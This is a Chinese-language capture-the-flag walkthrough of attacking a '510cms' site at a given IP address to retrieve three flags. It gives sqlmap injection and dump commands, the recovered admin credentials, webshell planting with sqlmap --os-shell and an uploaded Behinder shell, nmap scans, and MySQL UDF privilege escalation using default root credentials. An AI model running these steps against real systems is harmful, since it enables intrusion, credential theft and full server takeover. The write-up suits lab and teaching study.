对510cms进行渗透测试，找到其中的3个flag

对510cms进行渗透测试，找到其中的3个flag

拿到网站

 

简单观察后发现url区域存在传参

简单测试找到存在注入的界面（此网站多处网址存在注入）

这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入

  

我们针对此界面（180.76.226.182/about.php?listid=6）使用sqlmap进行爆破

sqlmap -u 180.76.226.182/about.php?listid=6 --current-db

爆当前数据库名

得到数据库名为“510cms”

然后指定该数据库爆它的所有表

sqlmap -u 180.76.226.182/about.php?listid=6 -D 510cms --tables得到如下一些表

根据经验我们爆510_admin表的所有内容

sqlmap -u 180.76.226.182/about.php?listid=6 -D 510cms -T 510_admin --dump

需要等待较长时间

 

 

这里找到第一个flag

并找到登录后台的name和passwd

admin—123qwer（采用md5加密）

但是我们没有发现登录后台的地址

所以我们尝试使用御剑扫描此网站

发现很多网站后台

逐一打开查看能够找到管理登录的界面和一些没有权限登录的界面

其中没有权限登录的界面点击提示后同样打开管理登录界面

  

返回浏览器使用前面获取到的用户名和密码尝试登录

(注意登录界面的验证码需要区分大小写)

  

登录成功

发现大量信息

我们可以尝试挂马

sqlmap -u 180.76.226.182/about.php?listid=6 --os-shell --batch --thread 5

  

挂马成功

同时给我们两个页面

第二个是sqlmap挂的马的界面

第一个是给了我们一个上传的页面

我们通过第一个上传的界面在网站的根目录上传一个马

（要能被网站的中间件解析、能被执行）

此马为冰蝎下的shell.php（为防止重复将其改了名为zhaoxi.php）

如下图

访问该界面发现已经上传成功

然后使用冰蝎尝试连接此马

密码在我们上传的马里

连接成功

然后我们就可以通过冰蝎对此网站进行一些简单的操作

最后我们在网站的根目录下找到了第二个flag

也能在此目录下看到我们挂的马

  

经过查找

在此主机的根目录下发现第三个flag

但是我们没有权限打开，需要进行提权

此时想到前面我们登录网站管理后台发现的一些信息

我们可以利用这些信息去搜索相关服务器、数据库等版本的提权漏洞信息进行提权

最后我们发现需要利用MySQL数据库此版本的一个udf提权漏洞

(此漏洞的利用需要知道MySQL数据库的端口、用户名和密码等信息)

我们尝试使用namap工具扫描端口开放情况

nmap 180.76.226.182 -p 1-65535

(需要等待一段时间，可点击回车键查看进度)

  

指定该端口添加参数进行详细扫描

nmap 180.76.226.182 -p3306 -A

确定该端口就是masql数据库的端口，且处于开放状态

Mysql数据库的用户名和密码默认存放在首页地址的config.php中

我们可以去看一看

我们在首页地址下并没有找到该文件，但是发现了一个configs

打开发现config.php存在此文件里

  

找到用户名和密码均为root、采用GBK编码等信息

接下来我们尝试采用两种方式进行udf提权

1.使用Navicat工具远程连接数据库

连接成功

使用查询语句找出写入目录

查询—>新建查询—>输入语句—>运行

show variables like '%plugin%'; 

将udf.dll代码的16进制数写入

(可搜索udf.dll源码通过在线工具转换为16进制)

创建sys_eval函数

这里函数已被创建过了所以会报错显示函数已存在

既然已经有了这个函数，我们就可以通过利用sys_eval函数读取根目录下的flag

select sys_eval('cat /');

得到第三个flag

接下来我们使用第二种方式找到第三个flag

2.使用sqlmap提权

(这里最好使用kali下的sqlmap，Windows下的sqlmap可能缺少某些库导致报错)

sqlmap -d "mysql://root:root@180.76.226.182:3306/mysql" --os-shell

注意这里要输入2来选择64-bit

进入shell

ls查看目录下的文件找到第三个flag

cat /查看flag

完成